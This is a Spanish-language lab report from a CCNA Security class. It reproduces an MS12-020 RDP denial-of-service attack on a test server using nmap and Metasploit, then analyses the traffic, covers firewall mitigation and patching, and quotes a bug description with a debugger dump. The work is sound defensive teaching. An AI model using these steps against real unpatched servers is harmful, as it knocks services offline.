Pruebas de DoS mediante RDP y análisis forense del tráfico

Fecha: 20 de mayo del 2015 Clase: CCNA Security

 

Escenario

 

 

Este escenario se realizó con equipos reales, un router Cisco 2801 como firewall ZBF, una máquina corriendo Kali linux,

y la herramienta Metasploit, y un server Windows 2008.

 

Se realizó el port forwarding de los puertos TCP 3389 y 80 para acceder desde “el exterior” a los respectivos servicios.

 

 

1.- Test inicial

 

Se prueba conectividad con ping y se ejecuta una sesión de nmap para detectar los puertos abiertos en el objetivo.

 

 

2.- Se ejecuta el script para detectar vulnerabilidades en el RDP

 

D:\nmap>nmap 200.0.0.1  --script=rdp-vuln-ms12-020.nse (test de vulnerabilidad de cpa 7 del puerto RDP)

 

Starting Nmap 6.40 ( http://nmap.org ) at 2015-05-21 11:41Hora est. de SudamÚrica E.

Nmap scan report for 200.0.0.1

---resumido---

3389/tcp open  ms-wbt-server

| rdp-vuln-ms12-020:

|   VULNERABLE:

|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability

|     State: VULNERABLE

|     IDs:  CVE:CVE-2012-0152

|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)

|     Description:

|           Remote Desktop Protocol vulnerability that could allow remote attack

ers to cause a denial of service.

|

|     Disclosure date: 2012-03-13

|     References:

|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020

|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152

|

|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability

|     State: VULNERABLE

|     IDs:  CVE:CVE-2012-0002

|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)

|     Description:

|           Remote Desktop Protocol vulnerability that could allow remote attack

ers to execute arbitrary code on the targeted system.

|

|     Disclosure date: 2012-03-13

|     References:

|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002

|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020

---resumido---

Nmap done: 1 IP address (1 host up) scanned in 3.66 seconds

 

3.- Ataque DoS

 

Se ejecuta metasploit seleccionando el tipo de ataque y configurando la IP del objetivo.

 

 

4.- Verificamos en el server RDP

 

 

 

5.- Tráfico involucrado (ver info sobre el exploit al final del documento)

 

La captura de tráfico de realizó luego del static NAT, entre el firewall y el server, por lo que vemos que la IP destino

es 192.168.1.10, la IP real del server.

 

 

6.- Detalle de la trama #9, que es la que ejecuta puntualmente el ataque

 

Frame 9: 276 bytes on wire (2208 bits), 276 bytes captured (2208 bits) on interface 0

Ethernet II, Src: 00:25:45:1e:73:4c (00:25:45:1e:73:4c), Dst: 00:1e:8c:1e:24:f7 (00:1e:8c:1e:24:f7)

Internet Protocol Version 4, Src: 200.0.0.10 (200.0.0.10), Dst: 192.168.1.10 (192.168.1.10)

Transmission Control Protocol, Src Port: 50033 (50033), Dst Port: 3389 (3389), Seq: 1, Ack: 1, Len: 210

TPKT, Version: 3, Length: 19

ISO 8073 COTP Connection-Oriented Transport Protocol

[Malformed Packet: T.125]

    [Expert Info (Error/Malformed): Malformed Packet (Exception occurred)]

        [Message: Malformed Packet (Exception occurred)]

        [Severity level: Error]

        [Group: Malformed]

TPKT, Version: 3, Length: 106

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

[Malformed Packet: T.124]

    [Expert Info (Error/Malformed): Malformed Packet (Exception occurred)]

        [Message: Malformed Packet (Exception occurred)]

        [Severity level: Error]

        [Group: Malformed]

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 8

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 12

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

TPKT, Version: 3, Length: 9

ISO 8073 COTP Connection-Oriented Transport Protocol

MULTIPOINT-COMMUNICATION-SERVICE T.125

 

7.- Reacción en el firewall

 

Al tratarse de un ataque de layer 7, el firewall statefull tipo ZBF no registra ninguna anomalía, podrían registrarse

alarmas en el IPS, pero las firmas instaladas no soportan el ataque.

 

Firewall#show policy-map type inspect zone-pair session

 Zone-pair: segura-insegura

 

  Service-policy inspect : policy1

 

    Class-map: ICMP (match-any)

      Match: protocol icmp

        0 packets, 0 bytes

        30 second rate 0 bps

      Inspect

 

    Class-map: saliente (match-any)

      Match: protocol ftp

        0 packets, 0 bytes

        30 second rate 0 bps

      Match: protocol http

        0 packets, 0 bytes

        30 second rate 0 bps

      Match: protocol dns

        1 packets, 42 bytes

        30 second rate 0 bps

      Inspect

 

    Class-map: class-default (match-any)

      Match: any

      Drop (default action)

        0 packets, 0 bytes

 Zone-pair: insegura-segura

 

  Service-policy inspect : policy2

 

    Class-map: ccp-cls-policy2-1 (match-all)

      Match: class-map match-any NetBios

        Match: protocol netbios-dgm

          0 packets, 0 bytes

          30 second rate 0 bps

        Match: protocol netbios-ssn

          0 packets, 0 bytes

          30 second rate 0 bps

      Match: access-group name NetBios

      Inspect

 

    Class-map: entrante (match-any)

      Match: protocol http

        0 packets, 0 bytes

        30 second rate 0 bps

      Inspect

 

    Class-map: ICMP (match-any)

      Match: protocol icmp

        0 packets, 0 bytes

        30 second rate 0 bps

      Inspect

 

    Class-map: RDP (match-any)

      Match: access-group name RDP

        4 packets, 144 bytes

        30 second rate 0 bps

      Inspect

        Half-open Sessions (sesión del ataque, luego del RST, hubo varios SYN, ver tramas #34 a 37)

         Session 6437AF0C (200.0.0.10:40883)=>(192.168.1.10:3389) tcp SIS_OPENING

          Created 00:00:28, Last heard 00:00:21

          Bytes sent (initiator:responder) [0:0]

        Established Sessions (sesión de monitoreo, se interrumpió al momento del ataque)

         Session 6437AF0C (200.0.0.110:49397)=>(192.168.1.10:3389) tcp SIS_OPEN

          Created 00:00:07, Last heard 00:00:06

          Bytes sent (initiator:responder) [47:19]

    Class-map: class-default (match-any)

      Match: any

      Drop (default action)

        0 packets, 0 bytes

Firewall#

 

8.- Cambios en el port 3389 para mitigar el ataque

 

Hasta que el parche contra los ataques RDP sean instalados, debería cerrarse el puerto en forma preventiva.

Se intentó hacerlo de dos maneras: mediante el ZBF y mediante NAT, ambas pruebas arrojaron resultados diferentes.

 

8.1.- Método ZBF

 

Esto descartará todos los paquetes que lleguen al port 3389.

Firewall#conf t

Enter configuration commands, one per line.  End with CNTL/Z.

Firewall(config)#policy-map type inspect policy2

Firewall(config-pmap)#class type inspect RDP

Firewall(config-pmap-c)#no inspect

Firewall(config-pmap-c)#drop

Firewall(config-pmap-c)#exit

Firewall(config-pmap)#exit

Firewall(config)#

 

 

8.2.- Por qué el puerto 3389 figura “filtered” en vez de NO figurar ?

 

Porque todos los puertos del router (los no “nateados” hacia la LAN) se responden con un RST, ACK, los puertos

“nateados” no se responden con RST, ACK, por lo tanto ese puerto se considera filtrado.

 

 

Puede verse el puerto 21 (FTP, tramas #3 y #14), que no está “nateado” hacia el server, devuelve respuestas RTS y ACK,

 y el 3389 no tiene las mismas respuestas RST, ACK, por lo que es un puerto que no exiista, sino que descarta las respuestas

al ser filtrado ahora por la política del firewall ZBF.

 

8.3.- Método NAT

 

Se quita el NAT de la configuración del firewall ZBF.

 

Firewall(config)#no ip nat inside source static tcp 192.168.1.10 3389 200.0.0.1 3389 extendable

 

8.4.- Test post-cambios NAT

 

Verificamos que ahora el router devuelve RST,ACK para el port 3389 al no tenerlo en su configuración,

por lo tanto el nmap no lo detecta.

 

 

9.- Aplicación del parche

 

Una vez aplicado el parche, activado el inspect en la policy y reconfigurado el static NAT, el ataque no se hace efectivo,

y el scan devuelve lo siguiente:

 

D:\nmap>nmap 200.0.0.1  --script=rdp-vuln-ms12-020.nse

 

Starting Nmap 6.40 ( http://nmap.org ) at 2015-05-21 12:05Hora est. de SudamÚrica E.

Nmap scan report for 200.0.0.1

---resumido---

3389/tcp open  ms-wbt-server (no devuelve ningún resultado del script)

---resumido---

Nmap done: 1 IP address (1 host up) scanned in 4.06 seconds

 

10.- Mas info sobre el ataque:

 

https://technet.microsoft.com/en-us/library/security/ms12-020.aspx

 

http://blogs.technet.com/b/srd/archive/2012/03/13/cve-2012-0002-a-closer-look-at-ms12-020-s-critical-issue.aspx

 

https://www.exploit-db.com/exploits/18606/

 

11.- Bug description

 

The Remote Desktop Protocol is used by the "Terminal Services / Remote

Desktop Services" and works at kernel level on port 3389.

 

There is an use-after-free vulnerability located in the handling of the

maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of

the provided proof-of-concept) when set to a value minor/equal than 5.

 

The problem happens during the disconnection of the user started with

RDPWD!NM_Disconnect while the effect of the possible code execution is

visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on

Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid

memory pointer, the following dump is taken from Windows 2003 Server:

 

  f761887c 8bff            mov     edi,edi

  f761887e 55              push    ebp

  f761887f 8bec           mov     ebp,esp

  f7618881 56              push    esi

  f7618882 57              push    edi

  f7618883 8b7d08     mov     edi,dword ptr [ebp+8]

  f7618886 8d47ec     lea     eax,[edi-14h]

  f7618889 50              push    eax

  f761888a eb09          jmp     termdd!IcaBufferAlloc+0x19 (f7618895)

  f761888c 8b4618     mov     eax,dword ptr [esi+18h]                  ; we are here

  f761888f 833800      cmp     dword ptr [eax],0                        ; or here

  f7618892 7527          jne     termdd!IcaBufferAlloc+0x3f (f76188bb)    ; must jump

  f7618894 56              push    esi

  f7618895 e878290000      call    termdd!IcaGetPreviousSdLink (f761b212)   ; the new ESI is returned by this function

  f761889a 8bf0            mov     esi,eax

  f761889c 85f6            test    esi,esi

  f761889e 75ec           jne     termdd!IcaBufferAlloc+0x10 (f761888c)

  f76188a0 ff751c        push    dword ptr [ebp+1Ch]

  f76188a3 ff7518        push    dword ptr [ebp+18h]

  f76188a6 ff7514        push    dword ptr [ebp+14h]

  f76188a9 ff7510        push    dword ptr [ebp+10h]

  f76188ac ff750c         push    dword ptr [ebp+0Ch]

  f76188af 57                push    edi

  f76188b0 e8b9fcffff      call    termdd!IcaBufferAllocInternal (f761856e)

  f76188b5 5f              pop     edi

  f76188b6 5e              pop     esi

  f76188b7 5d              pop     ebp

  f76188b8 c21800      ret     18h

  f76188bb 33c0          xor     eax,eax

  f76188bd 53              push    ebx

  f76188be 8d7e10     lea     edi,[esi+10h]

  f76188c1 40              inc     eax

  f76188c2 f00fc107    lock xadd dword ptr [edi],eax

  f76188c6 ff751c         push    dword ptr [ebp+1Ch]

  f76188c9 8b4618       mov     eax,dword ptr [esi+18h] ; the same value of before

  f76188cc ff7518         push    dword ptr [ebp+18h]

  f76188cf ff7514          push    dword ptr [ebp+14h]

  f76188d2 ff7510          push    dword ptr [ebp+10h]

  f76188d5 ff750c          push    dword ptr [ebp+0Ch]

  f76188d8 ff761c          push    dword ptr [esi+1Ch]

  f76188db ff10              call    dword ptr [eax]  ; code execution

  f76188dd 8bd8            mov     ebx,eax

  f76188df 83c8ff           or      eax,0FFFFFFFFh

  f76188e2 f00fc107      lock xadd dword ptr [edi],eax

  f76188e6 7506             jne     termdd!IcaBufferAlloc+0x72 (f76188ee)

  f76188e8 56                 push    esi

  f76188e9 e8382f0000      call    termdd!_IcaUnloadSd (f761b826)

  f76188ee 8bc3             mov     eax,ebx

  f76188f0 5b                  pop     ebx

  f76188f1 ebc2              jmp     termdd!IcaBufferAlloc+0x39 (f76188b5)

 

  eax=040b0402 ebx=e1492090 ecx=00390080 edx=00000003 esi=040b0402 edi=e1438240

  eip=f762888c esp=b832f9d8 ebp=b832f9e0 iopl=0         nv up ei pl nz na po nc

  cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202

  termdd!IcaBufferAlloc+0x10:

  f762888c 8b4618          mov     eax,dword ptr [esi+18h] ds:0023:040b041a=????????

 

  ChildEBP RetAddr 

  b8b399e0 b89c1c34 termdd!IcaBufferAlloc+0x10

  b8b39a00 b89c1c67 RDPWD!StackBufferAlloc+0x26

  b8b39a2c b89a902c RDPWD!MCSDetachUserRequest+0x29

  b8b39a40 b89a8b44 RDPWD!NMDetachUserReq+0x14

  b8b39a4c b89a9185 RDPWD!NM_Disconnect+0x16

  b8b39a58 b89adcb4 RDPWD!SM_Disconnect+0x27

  b8b39a68 b89a906d RDPWD!SM_OnConnected+0x70

  b8b39a88 b89a8db4 RDPWD!NMAbortConnect+0x23

  b8b39ac0 b89a9d88 RDPWD!NM_Connect+0x86

  b8b39ae0 b89abcfc RDPWD!SM_Connect+0x112

  b8b39b08 b89ac786 RDPWD!WDWConnect+0x368

  b8b39b3c b89a6959 RDPWD!WDWConfConnect+0x94

  b8b39b70 f762c1c7 RDPWD!WD_Ioctl+0x1227

  b8b39b8c f762c5a3 termdd!_IcaCallSd+0x35

  b8b39bac f762ca10 termdd!_IcaCallStack+0x55

  b8b39bf4 f762abcc termdd!IcaDeviceControlStack+0x414

  b8b39c24 f762ad20 termdd!IcaDeviceControl+0x4e

  b8b39c3c 8081d5c3 termdd!IcaDispatch+0x12a

  b8b39c50 808ed4eb nt!IofCallDriver+0x45

  b8b39c64 808ee28d nt!NtWriteFile+0x2943

  b8b39d00 808e6dbc nt!NtWriteFile+0x36e5

  b8b39d34 80883968 nt!NtDeviceIoControlFile+0x2a

  b8b39d64 7c82847c nt!KeReleaseInStackQueuedSpinLockFromDpcLevel+0xb14

  b8b39d68 badb0d00 ntdll!_NLG_Notify+0x14

 

On Windows 2003 that zone of the memory pointed by ESI+18 using the

provided proof-of-concept is ever in the range 040b02??-040b04??.

The exploitability depends by the possibility of controlling ESI or the

content pointed by it (maybe via a form of heap spraying?), indeed in

my quick tests this zone sometimes is allocated and others it isn't.

 

Note that on the post-Vista Windows versions (like 7 and 2008) "seems"

necessary to have "Allow connections from computers running any version

of Remote Desktop" for being vulnerable.

Anyway I'm not totally sure about this so-called limitation because it

looks like dependent by my proof-of-concept only.

 

The provided proof-of-concept uses the BER integer values set at 32bit

(big endian) in case they could be useful for easier debugging.

 

12.- Additional details about the protocol

 

http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx

 

13.- Fix

 

http://technet.microsoft.com/en-us/security/bulletin/ms12-020

 

 

 

(2015) I see dead packets…

Rosario, Argentina